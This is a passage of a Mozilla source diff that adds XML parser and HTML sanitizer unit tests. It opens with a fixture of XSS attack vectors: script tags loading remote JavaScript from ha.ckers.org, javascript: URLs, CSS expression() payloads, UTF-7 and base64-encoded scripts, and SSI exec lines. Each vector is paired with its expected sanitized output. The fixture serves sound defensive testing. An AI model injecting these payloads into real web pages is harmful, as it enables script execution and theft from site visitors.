HREF=\"http://ha.ckers.org/xss.css\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<META HTTP-EQUIV=\"Link\" Content=\"<http://ha.ckers.org/xss.css>; REL=stylesheet\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<STYLE>BODY{-moz-binding:url(\"http://ha.ckers.org/xssmoz.xml#xss\")}</STYLE>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<IMG SRC='vbscript:msgbox(\"XSS\")'>", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=\"mocha:[code]\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<IMG SRC=\"livescript:[code]\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=javascript:alert('XSS');\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<META HTTP-EQUIV=\"Link\" Content=\"<javascript:alert('XSS')>; REL=stylesheet\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<META HTTP-EQUIV=\"refresh\" CONTENT=\"0; URL=http://;URL=javascript:alert('XSS');\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<IFRAME SRC=\"javascript:alert('XSS');\"></IFRAME>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>", + "sanitized": "<html><head></head></html>" + }, + { + "data": "<TABLE BACKGROUND=\"javascript:alert('XSS')\">", + "sanitized": "<html><head></head><body><table></table></body></html>" + }, + { + "data": "<DIV 
STYLE=\"background-image: url(javascript:alert('XSS'))\">", + "sanitized": "<html><head></head><body><div></div></body></html>" + }, + { + "data": "<DIV STYLE=\"background-image: url(javascript:alert('XSS'))\">", + "sanitized": "<html><head></head><body><div></div></body></html>" + }, + { + "data": "<DIV STYLE=\"width: expression(alert('XSS'));\">", + "sanitized": "<html><head></head><body><div></div></body></html>" + }, + { + "data": "<STYLE>@im\\port'\\ja\\vasc\\ript:alert(\"XSS\")';</STYLE>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<IMG STYLE=\"xss:expr/*XSS*/ession(alert('XSS'))\">", + "sanitized": "<html><head></head><body><img></body></html>" + }, + { + "data": "<XSS STYLE=\"xss:expression(alert('XSS'))\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "exp/*<XSS STYLE='no\\xss:noxss(\"*//*\");", + "sanitized": "<html><head></head><body>exp/*</body></html>" + }, + { + "data": "<STYLE TYPE=\"text/javascript\">alert('XSS');</STYLE>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<STYLE>.XSS{background-image:url(\"javascript:alert('XSS')\");}</STYLE><A CLASS=XSS></A>", + "sanitized": "<html><head></head><body><a class=\"XSS\"></a></body></html>" + }, + { + "data": "<STYLE type=\"text/css\">BODY{background:url(\"javascript:alert('XSS')\")}</STYLE>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<BASE HREF=\"javascript:alert('XSS');//\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<OBJECT TYPE=\"text/x-scriptlet\" DATA=\"http://ha.ckers.org/scriptlet.html\"></OBJECT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "getURL(\"javascript:alert('XSS')\")", + "sanitized": 
"<html><head></head><body>getURL(\"javascript:alert('XSS')\")</body></html>" + }, + { + "data": "a=\"get\";", + "sanitized": "<html><head></head><body>a=\"get\";</body></html>" + }, + { + "data": "<!--<value><![CDATA[<XML ID=I><X><C><![CDATA[<IMG SRC=\"javas<![CDATA[cript:alert('XSS');\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<XML SRC=\"http://ha.ckers.org/xsstest.xml\" ID=I></XML>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<HTML><BODY>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<SCRIPT SRC=\"http://ha.ckers.org/xss.jpg\"></SCRIPT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<!--#exec cmd=\"/bin/echo '<SCRIPT SRC'\"--><!--#exec cmd=\"/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'\"-->", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<? echo('<SCR)';", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<META HTTP-EQUIV=\"Set-Cookie\" Content=\"USERID=<SCRIPT>alert('XSS')</SCRIPT>\">", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<HEAD><META HTTP-EQUIV=\"CONTENT-TYPE\" CONTENT=\"text/html; charset=UTF-7\"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-", + "sanitized": "<html><head> </head><body>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-</body></html>" + }, + { + "data": "<SCRIPT a=\">\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<SCRIPT a=\">\" '' SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<SCRIPT \"a='>'\" SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + "data": "<SCRIPT a=`>` SRC=\"http://ha.ckers.org/xss.js\"></SCRIPT>", + "sanitized": "<html><head></head><body></body></html>" + }, + { + 
"data": "<SCRIPT>document.write(\"<SCRI\");</SCRIPT>PT SRC", + "sanitized": "<html><head></head><body>PT SRC</body></html>" + }, + { + "data": "", + "sanitized": "<html><head></head><body></body></html>" + } +] diff --git a/parser/xml/test/unit/test_namespace_support.js b/parser/xml/test/unit/test_namespace_support.js new file mode 100644 index 000000000..bcad61e91 --- /dev/null +++ b/parser/xml/test/unit/test_namespace_support.js @@ -0,0 +1,52 @@ +function noop() {} + +function run_test() { + var contentHandler = { + attrs: null, + reset: function() { + this.attrs = []; + }, + startDocument: noop, + endDocument: noop, + + startElement: function startElement(aNamespaceURI, aLocalName, aNodeName, aAttrs) { + for (var i = 0; i < aAttrs.length; i++) + this.attrs.push(aAttrs.getQName(i)); + }, + + endElement: noop, + characters: noop, + processingInstruction: noop, + ignorableWhitespace: noop, + startPrefixMapping: noop, + endPrefixMapping: noop + }; + + const nsISAXXMLReader = Components.interfaces.nsISAXXMLReader; + const src = "<a:x xmlns:a='foo' y='bar'/>"; + const NS_PREFIX = "http://xml.org/sax/features/namespace-prefixes"; + + var saxReader = Components.classes["@mozilla.org/saxparser/xmlreader;1"] + .createInstance(nsISAXXMLReader); + do_check_false(saxReader.getFeature(NS_PREFIX)); + saxReader.contentHandler = contentHandler; + contentHandler.reset(); + saxReader.parseFromString(src, "application/xml"); + do_check_eq(contentHandler.attrs.length, 1); + do_check_eq(contentHandler.attrs[0], "y"); + + saxReader.setFeature(NS_PREFIX, true); + do_check_true(saxReader.getFeature(NS_PREFIX)); + contentHandler.reset(); + saxReader.parseFromString(src, "application/xml"); + do_check_eq(contentHandler.attrs.length, 2); + do_check_eq(contentHandler.attrs[0], "xmlns:a"); + do_check_eq(contentHandler.attrs[1], "y"); + + saxReader.setFeature(NS_PREFIX, false); + do_check_false(saxReader.getFeature(NS_PREFIX)); + contentHandler.reset(); + saxReader.parseFromString(src, 
"application/xml"); + do_check_eq(contentHandler.attrs.length, 1); + do_check_eq(contentHandler.attrs[0], "y"); +} diff --git a/parser/xml/test/unit/test_parser.js b/parser/xml/test/unit/test_parser.js new file mode 100644 index 000000000..79c32bae4 --- /dev/null +++ b/parser/xml/test/unit/test_parser.js @@ -0,0 +1,167 @@ +function updateDocumentSourceMaps(source) { + const nsIDOMNode = Components.interfaces.nsIDOMNode; + + const nsISAXXMLReader = Components.interfaces.nsISAXXMLReader; + const saxReader = Components.classes["@mozilla.org/saxparser/xmlreader;1"] + .createInstance(nsISAXXMLReader); + try { + saxReader.setFeature("http://xml.org/sax/features/namespace-prefixes", true); + saxReader.setFeature("http://xml.org/sax/features/namespace", true); + } + catch (e) { + // do nothing, we'll accept it as it is. + } + var parseErrorLog = []; + + /* XXX ajvincent Because throwing an exception doesn't stop parsing, we need + * to record errors and handle them after the parsing is finished. 
+ */ + function do_parse_check(aCondition, aMsg) { + if (!aCondition) + parseErrorLog[parseErrorLog.length] = aMsg; + } + + var contentHandler = { + startDocument: function startDocument() { + }, + + endDocument: function endDocument() { + }, + + handleAttributes: function handleAttributes(aAttributes) { + for (var i = 0; i < aAttributes.length; i++) { + var attrNamespaceURI = aAttributes.getURI(i); + var attrLocalName = aAttributes.getLocalName(i); + var attrNodeName = aAttributes.getQName(i); + var value = aAttributes.getValue(i); + do_parse_check(attrLocalName, "Missing attribute local name"); + do_parse_check(attrNodeName, "Missing attribute node name"); + } + }, + + startElement: function startElement(aNamespaceURI, aLocalName, aNodeName, aAttributes) { + do_parse_check(aLocalName, "Missing element local name (startElement)"); + do_parse_check(aNodeName, "Missing element node name (startElement)"); + do_parse_check(aAttributes, "Missing element attributes"); + this.handleAttributes(aAttributes); + }, + + endElement: function endElement(aNamespaceURI, aLocalName, aNodeName) { + do_parse_check(aLocalName, "Missing element local name (endElement)"); + do_parse_check(aNodeName, "Missing element node name (endElement)"); + }, + + inCDataSection: false, + + characters: function characters(aData) { + }, + + processingInstruction: function processingInstruction(aTarget, aData) { + do_parse_check(aTarget, "Missing processing instruction target"); + }, + + ignorableWhitespace: function ignorableWhitespace(aWhitespace) { + }, + + startPrefixMapping: function startPrefixMapping(aPrefix, aURI) { + }, + + endPrefixMapping: function endPrefixMapping(aPrefix) { + } + }; + + var lexicalHandler = { + comment: function comment(aContents) { + }, + + startDTD: function startDTD(aName, aPublicId, aSystemId) { + do_parse_check(aName, "Missing DTD name"); + }, + + endDTD: function endDTD() { + }, + + startCDATA: function startCDATA() { + }, + + endCDATA: function endCDATA() { + }, + 
+ startEntity: function startEntity(aName) { + do_parse_check(aName, "Missing entity name (startEntity)"); + }, + + endEntity: function endEntity(aName) { + do_parse_check(aName, "Missing entity name (endEntity)"); + } + }; + + var dtdHandler = { + notationDecl: function notationDecl(aName, aPublicId, aSystemId) { + do_parse_check(aName, "Missing notation name"); + }, + + unparsedEntityDecl: + function unparsedEntityDecl(aName, aPublicId, aSystemId, aNotationName) { + do_parse_check(aName, "Missing entity name (unparsedEntityDecl)"); + } + }; + + var errorHandler = { + error: function error(aLocator, aError) { + do_parse_check(!aError, "XML error"); + }, + + fatalError: function fatalError(aLocator, aError) { + do_parse_check(!aError, "XML fatal error"); + }, + + ignorableWarning: function ignorableWarning(aLocator, aError) { + do_parse_check(!aError, "XML ignorable warning"); + } + }; + + saxReader.contentHandler = contentHandler; + saxReader.lexicalHandler = lexicalHandler; + saxReader.dtdHandler = dtdHandler; + saxReader.errorHandler = errorHandler; + + saxReader.parseFromString(source, "application/xml"); + + // Just in case it leaks. + saxReader.contentHandler = null; + saxReader.lexicalHandler = null; + saxReader.dtdHandler = null; + saxReader.errorHandler = null; + + return parseErrorLog; +} + +function do_check_true_with_dump(aCondition, aParseLog) { + if (!aCondition) { + dump(aParseLog.join("\n")); + } + do_check_true(aCondition); +} + +function run_test() { + var src; + src = "<!DOCTYPE foo>\n<!-- all your foo are belong to bar -->"; + src += "<foo id='foo'>\n<?foo wooly bully?>\nfoo"; + src += "<![CDATA[foo fighters]]></foo>\n"; + var parseErrorLog = updateDocumentSourceMaps(src); + + if (parseErrorLog.length > 0) { + dump(parseErrorLog.join("\n")); + } + do_check_true_with_dump(parseErrorLog.length == 0, parseErrorLog); + + // End tag isn't well-formed. 
+ src = "<!DOCTYPE foo>\n<!-- all your foo are belong to bar -->"; + src += "<foo id='foo'>\n<?foo wooly bully?>\nfoo"; + src += "<![CDATA[foo fighters]]></foo\n"; + + parseErrorLog = updateDocumentSourceMaps(src); + + do_check_true_with_dump(parseErrorLog.length == 1 && parseErrorLog[0] == "XML fatal error", parseErrorLog); +} diff --git a/parser/xml/test/unit/test_sanitizer.js b/parser/xml/test/unit/test_sanitizer.js new file mode 100644 index 000000000..b8aaa1e08 --- /dev/null +++ b/parser/xml/test/unit/test_sanitizer.js @@ -0,0 +1,21 @@ +function run_test() { + var Ci = Components.interfaces; + var Cc = Components.classes; + + // vectors by the html5security project (https://code.google.com/p/html5security/ & Creative Commons 3.0 BY), see CC-BY-LICENSE for the full license + load("results.js"); // gives us a `vectors' array + + var ParserUtils = Cc["@mozilla.org/parserutils;1"].getService(Ci.nsIParserUtils); + var sanitizeFlags = ParserUtils.SanitizerCidEmbedsOnly|ParserUtils.SanitizerDropForms|ParserUtils.SanitizerDropNonCSSPresentation; + // flags according to + // http://mxr.mozilla.org/comm-central/source/mailnews/mime/src/mimemoz2.cpp#2218 + // and default settings + + + for (var item in vectors) { + var evil = vectors[item].data; + var sanitized = vectors[item].sanitized; + var out = ParserUtils.sanitize(evil, sanitizeFlags); + do_check_eq(sanitized, out); + } +} diff --git a/parser/xml/test/unit/test_xml_declaration.js b/parser/xml/test/unit/test_xml_declaration.js new file mode 100644 index 000000000..4cad511fb --- /dev/null +++ b/parser/xml/test/unit/test_xml_declaration.js @@ -0,0 +1,82 @@ +function noop() {} + +function run_test() { + var evts; + + var contentHandler = { + attrs: null, + startDocument: function() { + evts.push("startDocument"); + }, + endDocument: noop, + + startElement: function startElement() { + evts.push("startElement"); + }, + + endElement: noop, + characters: noop, + processingInstruction: noop, + ignorableWhitespace: noop, + 
startPrefixMapping: noop, + endPrefixMapping: noop + }; + + function XMLDeclHandler(version, encoding, standalone) { + evts.splice(evts.length, 0, version, encoding, standalone); + } + + const nsISAXXMLReader = Components.interfaces.nsISAXXMLReader; + var saxReader = Components.classes["@mozilla.org/saxparser/xmlreader;1"] + .createInstance(nsISAXXMLReader); + saxReader.contentHandler = contentHandler; + saxReader.declarationHandler = XMLDeclHandler; + + evts = []; + saxReader.parseFromString("<root/>", "application/xml"); + do_check_eq(evts.length, 2); + do_check_eq(evts[0], "startDocument"); + do_check_eq(evts[1], "startElement"); + + evts = []; + saxReader.parseFromString("<?xml version='1.0'?><root/>", "application/xml"); + do_check_eq(evts.length, 5); + do_check_eq(evts[0], "startDocument"); + do_check_eq(evts[1], "1.0"); + do_check_eq(evts[2], ""); + do_check_false(evts[3]); + do_check_eq(evts[4], "startElement"); + + evts = []; + saxReader.parseFromString("<?xml version='1.0' encoding='UTF-8'?><root/>", "application/xml"); + do_check_eq(evts.length, 5); + do_check_eq(evts[0], "startDocument"); + do_check_eq(evts[1], "1.0"); + do_check_eq(evts[2], "UTF-8"); + do_check_false(evts[3]); + do_check_eq(evts[4], "startElement"); + + evts = []; + saxReader.parseFromString("<?xml version='1.0' standalone='yes'?><root/>", "application/xml"); + do_check_eq(evts.length, 5); + do_check_eq(evts[0], "startDocument"); + do_check_eq(evts[1], "1.0"); + do_check_eq(evts[2], ""); + do_check_true(evts[3]); + do_check_eq(evts[4], "startElement"); + + evts = []; + saxReader.parseFromString("<?xml version='1.0' encoding='UTF-8' standalone='yes'?><root/>", "application/xml"); + do_check_eq(evts.length, 5); + do_check_eq(evts[0], "startDocument"); + do_check_eq(evts[1], "1.0"); + do_check_eq(evts[2], "UTF-8"); + do_check_true(evts[3]); + do_check_eq(evts[4], "startElement"); + + evts = []; + // Not well-formed + saxReader.parseFromString("<?xml encoding='UTF-8'?><root/>", 
"application/xml"); + do_check_eq(evts.length, 1); + do_check_eq(evts[0], "startDocument"); +} diff --git a/parser/xml/test/unit/xpcshell.ini b/parser/xml/test/unit/xpcshell.ini new file mode 100644 index 000000000..78bb604d2 --- /dev/null +++ b/parser/xml/test/unit/xpcshell.ini @@ -0,0 +1,9 @@ +[DEFAULT] +head = +tail = +support-files = results.js + +[test_parser.js] +[test_namespace_support.js] +[test_xml_declaration.js] +[test_sanitizer.js] |